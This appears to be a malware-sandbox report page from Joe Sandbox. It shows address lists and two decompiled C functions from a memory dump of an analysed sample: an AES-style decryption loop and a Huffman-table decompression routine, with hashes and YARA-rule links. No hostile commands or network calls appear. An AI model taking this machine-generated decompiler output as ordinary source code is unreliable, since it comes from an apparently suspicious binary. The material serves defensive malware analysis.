0x000806ea
0x000806ec
0x000806f5
0x000806f5
0x00000000
0x000806ec
0x000806d7
0x000806e0
0x00000000
0x00000000
0x00000000
0x000806e0
0x000806b9
0x000806c2
0x00000000
0x00000000
0x00000000
0x000806c2
0x0008069b
0x000806a4
0x00000000
0x00000000
0x00000000
0x000806a4
0x000805fd
0x000805ff
0x00080617
0x0008061f
0x00080621
0x00080639
0x00080641
0x00080643
0x0008065b
0x00080663
0x00080665
0x0008066e
0x0008066e
0x00000000
0x00080665
0x0008064c
0x00080655
0x00000000
0x00000000
0x00000000
0x00080655
0x0008062a
0x00080633
0x00000000
0x00000000
0x00000000
0x00080633
0x00080608
0x00080611
0x00000000
0x00000000
0x00000000
0x00080611
0x00080566
0x00080568
0x00080580
0x00080588
0x0008058a
0x000805a2
0x000805aa
0x000805ac
0x000805c4
0x000805cc
0x000805ce
0x000805d7
0x000805d7
0x00000000
0x000805ce
0x000805b5
0x000805be
0x00000000
0x00000000
0x00000000
0x000805be
0x00080593
0x0008059c
0x00000000
0x00000000
0x00000000
0x0008059c
0x00080571
0x0008057a
0x00000000
0x00000000
0x00000000
0x0008057a
0x000804ce
0x000804d0
0x000804e8
0x000804f0
0x000804f2
0x0008050a
0x00080512
0x00080514
0x0008052c
0x00080534
0x00080536
0x0008053f
0x0008053f
0x00000000
0x00080536
0x0008051d
0x00080526
0x00000000
0x00000000
0x00000000
0x00080526
0x000804fb
0x00080504
0x00000000
0x00000000
0x00000000
0x00080504
0x000804d9
0x000804e2
0x00000000
0x00000000
0x00000000
0x000804e2
0x00080437
0x00080439
0x00080451
0x00080459
0x0008045b
0x00080473
0x0008047b
0x0008047d
0x00080495
0x0008049d
0x0008049f
0x000804a8
0x000804a8
0x00000000
0x0008049f
0x00080486
0x0008048f
0x00000000
0x00000000
0x00000000
0x0008048f
0x00080464
0x0008046d
0x00000000
0x00000000
0x00000000
0x0008046d
0x00080442
0x0008044b
0x00000000
0x00000000
0x00000000
0x0008044b
0x000803a0
0x000803a2
0x000803ba
0x000803c2
0x000803c4
0x000803dc
0x000803e4
0x000803e6
0x000803fe
0x00080406
0x00080408
0x00080411
0x00080411
0x00000000
0x00080408
0x000803ef
0x000803f8
0x00000000
0x00000000
0x00000000
0x000803f8
0x000803cd
0x000803d6
0x00000000
0x00000000
0x00000000
0x000803d6
0x000803ab
0x000803b4
0x00000000
0x00000000
0x00000000
0x000803b4
0x00080309
0x0008030b
0x00080323
0x0008032b
0x0008032d
0x00080345
0x0008034d
0x0008034f
0x00080367
0x0008036f
0x00080371
0x0008037a
0x0008037a
0x00000000
0x00080371
0x00080358
0x00080361
0x00000000
0x00000000
0x00000000
0x00080361
0x00080336
0x0008033f
0x00000000
0x00000000
0x00000000
0x0008033f
0x00080314
0x0008031d
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 856c31bc30136002637cb424565afade49c09c2791b59228d07aef72b5a3c189
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: C0C191362095930ADFED9639853403FBAE16BA27B131A176DD4F3CB1D4FE20D5689B20

Uniqueness

Uniqueness Score: -1.00%

Function 0006E2A0 Relevance: .3, Instructions: 318
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0006E2A0(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				intOrPtr _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				unsigned int _t424;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x6c);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x24)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x6c) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x38)) = __ecx + 8;
						E0007F4B0(_t431 + 0x5c, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
							return E0007F4B0( *((intOrPtr*)(_t432 + 0x38)), _t432 + 0x58, 0x10);
						}
						_t399 =  *(_t432 + 0x68);
						 *(_t432 + 0x24) = _t399 + 8;
						_t229 =  *((intOrPtr*)(_t432 + 0x78));
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x34)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x28) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x30) = _t359 + _t400 + 0xfffffff8;
							E0006E26E(_t432 + 0x54, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0xa61c0 + (_t402 & 0x000000ff) * 4) ^  *(0xa6dc0 + ( *(_t432 + 0x53) & 0x000000ff) * 4) ^  *(0xa69c0 + ( *(_t432 + 0x56) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x58);
							_t363 =  *(_t432 + 0x10) ^  *(0xa65c0 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t363;
							 *(_t432 + 0x3c) = _t363;
							_t403 =  *(_t432 + 0x50);
							_t368 =  *(0xa65c0 + (_t402 & 0x000000ff) * 4) ^  *(0xa61c0 + (_t403 & 0x000000ff) * 4) ^  *(0xa6dc0 + ( *(_t432 + 0x57) & 0x000000ff) * 4) ^  *(0xa69c0 + ( *(_t432 + 0x5a) & 0x000000ff) * 4);
							 *(_t432 + 0x14) = _t368;
							 *(_t432 + 0x40) = _t368;
							_t404 =  *(_t432 + 0x54);
							 *(_t432 + 0x18) =  *(0xa69c0 + ( *(_t432 + 0x4e) & 0x000000ff) * 4) ^  *(0xa65c0 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x18) ^  *(0xa61c0 + (_t404 & 0x000000ff) * 4) ^  *(0xa6dc0 + ( *(_t432 + 0x5b) & 0x000000ff) * 4);
							 *(_t432 + 0x18) = _t372;
							 *(_t432 + 0x44) = _t372;
							 *(_t432 + 0x1c) =  *(0xa6dc0 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0xa69c0 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x1c) ^  *(0xa65c0 + (_t404 & 0x000000ff) * 4) ^  *(0xa61c0 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x1c) = _t376;
							 *(_t432 + 0x48) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x10);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x1c) = _t309;
							_t430 = _t309;
							 *(_t432 + 0x20) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x10) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x18);
								 *(_t432 + 0x1c) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x14);
								_t416 =  *(0xa65c0 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa69c0 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa6dc0 + (_t356 >> 0x18) * 4) ^  *(0xa61c0 + ( *(_t432 + 0x10) & 0x000000ff) * 4);
								 *(_t432 + 0x3c) = _t416;
								 *(_t432 + 0x14) =  *(0xa69c0 + ( *(_t432 + 0x1c) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa6dc0 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x14) ^  *(0xa65c0 + ( *(_t432 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa61c0 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x14) = _t388;
								 *(_t432 + 0x40) = _t388;
								_t394 =  *(0xa6dc0 + ( *(_t432 + 0x1c) >> 0x18) * 4) ^  *(0xa65c0 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa69c0 + ( *(_t432 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa61c0 + (_t412 & 0x000000ff) * 4);
								 *(_t432 + 0x18) = _t394;
								 *(_t432 + 0x44) = _t394;
								_t376 =  *(0xa65c0 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa69c0 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa6dc0 + ( *(_t432 + 0x10) >> 0x18) * 4) ^  *(0xa61c0 + ( *(_t432 + 0x1c) & 0x000000ff) * 4);
								_t135 = _t432 + 0x20;
								 *_t135 =  *(_t432 + 0x20) - 1;
								 *(_t432 + 0x48) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t432 + 0x10) = _t416;
							_t415 =  *(_t432 + 0x74);
							 *(_t432 + 0x1c) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x10);
							 *(_t432 + 0x20) = _t253;
							 *(_t432 + 0x4c) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x1c);
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0xa50a0));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x18);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x14);
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0xa50a0));
							_t423 =  *(_t432 + 0x20);
							 *(_t432 + 0x54) = _t406;
							 *(_t432 + 0x50) = _t350;
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0xa50a0));
							 *(_t432 + 0x58) = _t378;
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t350 >> 0x18) + 0xa50a0));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0xa50a0));
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0xa50a0));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0xa50a0));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t406 >> 0x18) + 0xa50a0));
							 *(_t432 + 0x44) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0xa50a0));
							 *((char*)(_t432 + 0x45)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0xa50a0));
							_t424 = _t423 >> 0x18;
							 *((char*)(_t432 + 0x46)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0xa50a0));
							 *((char*)(_t432 + 0x47)) =  *((intOrPtr*)((_t378 >> 0x18) + 0xa50a0));
							 *(_t432 + 0x48) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0xa50a0));
							_t409 =  *(_t432 + 0x3c) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x49)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0xa50a0));
							 *((char*)(_t432 + 0x4a)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0xa50a0));
							_t188 = _t424 + 0xa50a0; // 0x30d56a09
							 *((char*)(_t432 + 0x4b)) =  *_t188;
							_t301 =  *(_t432 + 0x48) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x40) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x44) ^  *(_t429 + 0x20);
							 *(_t432 + 0x20) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x5c);
								_t426 = _t426 ^  *(_t432 + 0x60);
								_t353 = _t353 ^  *(_t432 + 0x64);
								 *(_t432 + 0x20) = _t301 ^  *(_t432 + 0x68);
							}
							 *(_t432 + 0x5c) =  *( *(_t432 + 0x30));
							_t304 =  *(_t432 + 0x24);
							 *(_t432 + 0x60) =  *(_t304 - 4);
							 *(_t432 + 0x64) =  *_t304;
							 *(_t432 + 0x68) = _t304[1];
							_t382 =  *(_t432 + 0x28);
							 *(_t432 + 0x24) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x20);
							_t400 =  *((intOrPtr*)(_t432 + 0x34));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x28) = _t359;
							 *(_t432 + 0x74) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E0006E762( *((intOrPtr*)(_t431 + 0x70)), _t415,  *((intOrPtr*)(_t431 + 0x70)));
				}
				return _t222;
			}

0x0006e2a5
0x0006e2a9
0x0006e2ab
0x0006e2b1
0x0006e2b7
0x0006e2be
0x0006e2c2
0x0006e2dd
0x0006e2e6
0x0006e2eb
0x0006e2f0
0x0006e747
0x00000000
0x0006e757
0x0006e2f6
0x0006e2ff
0x0006e303
0x0006e307
0x0006e309
0x0006e30d
0x0006e310
0x0006e314
0x0006e314
0x0006e324
0x0006e331
0x0006e336
0x0006e35c
0x0006e360
0x0006e36b
0x0006e372
0x0006e376
0x0006e37d
0x0006e3a3
0x0006e3af
0x0006e3b3
0x0006e3c1
0x0006e3cc
0x0006e3e3
0x0006e3ef
0x0006e3f3
0x0006e40a
0x0006e41f
0x0006e426
0x0006e427
0x0006e42b
0x0006e432
0x00000000
0x00000000
0x0006e438
0x0006e442
0x0006e445
0x0006e449
0x0006e44b
0x0006e44f
0x0006e454
0x0006e457
0x0006e45b
0x0006e461
0x0006e463
0x0006e467
0x0006e476
0x0006e4a6
0x0006e4b7
0x0006e4c9
0x0006e4e5
0x0006e4ee
0x0006e4f2
0x0006e52b
0x0006e532
0x0006e536
0x0006e563
0x0006e56a
0x0006e56a
0x0006e56f
0x0006e56f
0x0006e579
0x0006e57d
0x0006e581
0x0006e585
0x0006e589
0x0006e58c
0x0006e590
0x0006e594
0x0006e59e
0x0006e5ab
0x0006e5b7
0x0006e5be
0x0006e5c8
0x0006e5d4
0x0006e5d8
0x0006e5dc
0x0006e5e6
0x0006e5ef
0x0006e5f9
0x0006e606
0x0006e618
0x0006e62a
0x0006e639
0x0006e649
0x0006e65e
0x0006e66a
0x0006e673
0x0006e682
0x0006e68f
0x0006e69a
0x0006e6a3
0x0006e6b0
0x0006e6b4
0x0006e6ba
0x0006e6ca
0x0006e6cd
0x0006e6d0
0x0006e6d7
0x0006e6db
0x0006e6dd
0x0006e6e1
0x0006e6e5
0x0006e6ed
0x0006e6ed
0x0006e6f7
0x0006e6fb
0x0006e702
0x0006e708
0x0006e712
0x0006e716
0x0006e71a
0x0006e71e
0x0006e725
0x0006e728
0x0006e72c
0x0006e72f
0x0006e731
0x0006e734
0x0006e737
0x0006e73b
0x0006e73b
0x00000000
0x0006e746
0x00000000
0x0006e2cd
0x0006e75f

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b630aaba8a90dcfaaacd5830bb4f01a222c6352ac473a3874baa389426d7f46c
Instruction ID: cf62c98e3e8f0bcdf9e34af516396f22384ce31fe20de15f812fb919f0308560
Opcode Fuzzy Hash: b630aaba8a90dcfaaacd5830bb4f01a222c6352ac473a3874baa389426d7f46c
Instruction Fuzzy Hash: 04E127745087948FC304CF29D89096ABBF0BF8A341F89496EF5D587352C33AE919DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00073A3C Relevance: .3, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00073A3C(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t116;
				signed int _t127;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t148;
				signed int _t150;
				void* _t152;
				signed int _t155;
				signed int _t156;
				intOrPtr* _t157;
				intOrPtr* _t166;
				signed int _t169;
				void* _t170;
				signed int _t173;
				void* _t178;
				unsigned int _t180;
				signed int _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t192;
				signed int _t198;
				void* _t201;

				_t178 = __edx;
				_t185 = __ecx;
				_t184 = __ecx + 4;
				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
					L2:
					E0006A7E4(_t184,  ~( *(_t185 + 8)) & 0x00000007);
					_t82 = E0006A7FB(_t184);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t137 = 0;
						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E0007F350(_t184, _t185 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E0006A7E4(_t184, 2);
						do {
							 *(_t201 + 0x14) = E0006A7FB(_t184) >> 0x0000000c & 0x000000ff;
							E0006A7E4(_t184, 4);
							_t88 =  *(_t201 + 0x10);
							__eflags = _t88 - 0xf;
							if(_t88 != 0xf) {
								 *(_t201 + _t137 + 0x14) = _t88;
								goto L15;
							}
							_t187 = E0006A7FB(_t184) >> 0x0000000c & 0x000000ff;
							E0006A7E4(_t184, 4);
							__eflags = _t187;
							if(_t187 != 0) {
								_t188 = _t187 + 2;
								__eflags = _t188;
								while(1) {
									_t188 = _t188 - 1;
									__eflags = _t137 - 0x14;
									if(_t137 >= 0x14) {
										break;
									}
									 *(_t201 + _t137 + 0x14) = 0;
									_t137 = _t137 + 1;
									__eflags = _t188;
									if(_t188 != 0) {
										continue;
									}
									break;
								}
								_t137 = _t137 - 1;
								goto L15;
							}
							 *(_t201 + _t137 + 0x14) = 0xf;
							L15:
							_t137 = _t137 + 1;
							__eflags = _t137 - 0x14;
						} while (_t137 < 0x14);
						_push(0x14);
						_t189 = _t185 + 0x3c50;
						_push(_t189);
						_push(_t201 + 0x1c);
						E00073076();
						_t138 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
								L19:
								_t93 = E0006A800(_t184);
								_t94 =  *(_t189 + 0x84);
								_t180 = _t93 & 0x0000fffe;
								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
									_t148 = 0xf;
									_t95 = _t94 + 1;
									 *(_t201 + 0x10) = _t148;
									__eflags = _t95 - _t148;
									if(_t95 >= _t148) {
										L27:
										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
										 *_t184 =  *_t184 + (_t150 >> 3);
										_t98 =  *(_t201 + 0x10);
										 *(_t184 + 4) = _t150 & 0x00000007;
										_t152 = 0x10;
										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
										__eflags = _t155 -  *_t189;
										asm("sbb eax, eax");
										_t99 = _t98 & _t155;
										__eflags = _t99;
										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
										L28:
										__eflags = _t156 - 0x10;
										if(_t156 >= 0x10) {
											__eflags = _t156 - 0x12;
											if(__eflags >= 0) {
												_t157 = _t184;
												if(__eflags != 0) {
													_t192 = (E0006A7FB(_t157) >> 9) + 0xb;
													__eflags = _t192;
													_push(7);
												} else {
													_t192 = (E0006A7FB(_t157) >> 0xd) + 3;
													_push(3);
												}
												E0006A7E4(_t184);
												while(1) {
													_t192 = _t192 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) = 0;
													_t138 = _t138 + 1;
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													}
													L44:
													_t189 = _t185 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t156 - 0x10;
											_t166 = _t184;
											if(_t156 != 0x10) {
												_t198 = (E0006A7FB(_t166) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E0006A7FB(_t166) >> 0xd) + 3;
												_push(3);
											}
											E0006A7E4(_t184);
											__eflags = _t138;
											if(_t138 == 0) {
												L47:
												_t116 = 0;
												L49:
												return _t116;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
													_t138 = _t138 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
										_t138 = _t138 + 1;
										goto L45;
									}
									_t169 = 4 + _t95 * 4 + _t189;
									__eflags = _t169;
									while(1) {
										__eflags = _t180 -  *_t169;
										if(_t180 <  *_t169) {
											break;
										}
										_t95 = _t95 + 1;
										_t169 = _t169 + 4;
										__eflags = _t95 - 0xf;
										if(_t95 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t95;
									goto L27;
								}
								_t170 = 0x10;
								_t183 = _t180 >> _t170 - _t94;
								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
								 *_t184 =  *_t184 + (_t173 >> 3);
								 *(_t184 + 4) = _t173 & 0x00000007;
								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
								goto L28;
							}
							_t127 = E0007476C(_t185);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t138 - 0x194;
						} while (_t138 < 0x194);
						L46:
						 *((char*)(_t185 + 0xe661)) = 1;
						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
							_push(0x12b);
							_push(_t185 + 0xa0);
							_push(_t201 + 0x30);
							E00073076();
							_push(0x3c);
							_push(_t185 + 0xf8c);
							_push(_t201 + 0x15b);
							E00073076();
							_push(0x11);
							_push(_t185 + 0x1e78);
							_push(_t201 + 0x197);
							E00073076();
							_push(0x1c);
							_push(_t185 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00073076();
							E0007F4B0(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
							_t116 = 1;
							goto L49;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
					_push(_t185 + 0xe4c4);
					_push(_t185);
					return E0007284B(_t178, _t205);
				}
				_t135 = E0007476C(__ecx);
				if(_t135 != 0) {
					goto L2;
				}
				return _t135;
			}

0x00073a3c
0x00073a43
0x00073a4c
0x00073a54
0x00073a63
0x00073a6e
0x00073a75
0x00073a7a
0x00073a7f
0x00073aa4
0x00073aa6
0x00073aac
0x00073ab2
0x00073ab8
0x00073abd
0x00073acc
0x00073ad1
0x00073ad1
0x00073ad8
0x00073ade
0x00073aef
0x00073af3
0x00073af8
0x00073afc
0x00073aff
0x00073b38
0x00000000
0x00073b38
0x00073b0f
0x00073b12
0x00073b17
0x00073b19
0x00073b22
0x00073b22
0x00073b25
0x00073b25
0x00073b26
0x00073b29
0x00000000
0x00000000
0x00073b2b
0x00073b30
0x00073b31
0x00073b33
0x00000000
0x00000000
0x00000000
0x00073b33
0x00073b35
0x00000000
0x00073b35
0x00073b1b
0x00073b3c
0x00073b3c
0x00073b3d
0x00073b3d
0x00073b42
0x00073b44
0x00073b4c
0x00073b51
0x00073b52
0x00073b57
0x00073b57
0x00073b59
0x00073b62
0x00073b64
0x00073b75
0x00073b77
0x00073b7e
0x00073b84
0x00073b8a
0x00073b8e
0x00073bbb
0x00073bbc
0x00073bbd
0x00073bc1
0x00073bc3
0x00073be1
0x00073be4
0x00073bf0
0x00073bf2
0x00073bf6
0x00073bfb
0x00073c08
0x00073c0a
0x00073c0d
0x00073c0f
0x00073c0f
0x00073c11
0x00073c19
0x00073c19
0x00073c1c
0x00073c33
0x00073c36
0x00073c82
0x00073c84
0x00073ca1
0x00073ca1
0x00073ca4
0x00073c86
0x00073c90
0x00073c93
0x00073c93
0x00073ca8
0x00073cad
0x00073cad
0x00073cae
0x00073cb4
0x00000000
0x00000000
0x00073cb6
0x00073cbb
0x00073cbc
0x00073cbe
0x00000000
0x00000000
0x00073cc0
0x00073cc0
0x00000000
0x00073cc0
0x00000000
0x00073cad
0x00073c38
0x00073c3b
0x00073c3d
0x00073c5a
0x00073c5a
0x00073c5d
0x00073c3f
0x00073c49
0x00073c4c
0x00073c4c
0x00073c61
0x00073c66
0x00073c68
0x00073ce3
0x00073ce3
0x00073d62
0x00000000
0x00073c6a
0x00073c6a
0x00073c6a
0x00073c6b
0x00073c71
0x00000000
0x00000000
0x00073c77
0x00073c7b
0x00073c7c
0x00073c7e
0x00000000
0x00000000
0x00000000
0x00073c80
0x00000000
0x00073c6a
0x00073c68
0x00073c29
0x00073c2d
0x00000000
0x00073c2d
0x00073bcc
0x00073bcc
0x00073bce
0x00073bce
0x00073bd0
0x00000000
0x00000000
0x00073bd2
0x00073bd3
0x00073bd6
0x00073bd9
0x00000000
0x00000000
0x00000000
0x00073bdb
0x00073bdd
0x00000000
0x00073bdd
0x00073b92
0x00073b95
0x00073b9f
0x00073ba7
0x00073bac
0x00073baf
0x00000000
0x00073baf
0x00073b68
0x00073b6d
0x00073b6f
0x00000000
0x00000000
0x00000000
0x00073cc6
0x00073cc6
0x00073cc6
0x00073cd2
0x00073cd4
0x00073cdb
0x00073ce1
0x00073ce7
0x00073cf4
0x00073cf9
0x00073cfa
0x00073cff
0x00073d09
0x00073d11
0x00073d12
0x00073d17
0x00073d21
0x00073d29
0x00073d2a
0x00073d2f
0x00073d39
0x00073d41
0x00073d42
0x00073d58
0x00073d60
0x00000000
0x00073d60
0x00000000
0x00073ce1
0x00073a87
0x00073a91
0x00073a92
0x00000000
0x00073a99
0x00073a56
0x00073a5d
0x00000000
0x00000000
0x00073d6c

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
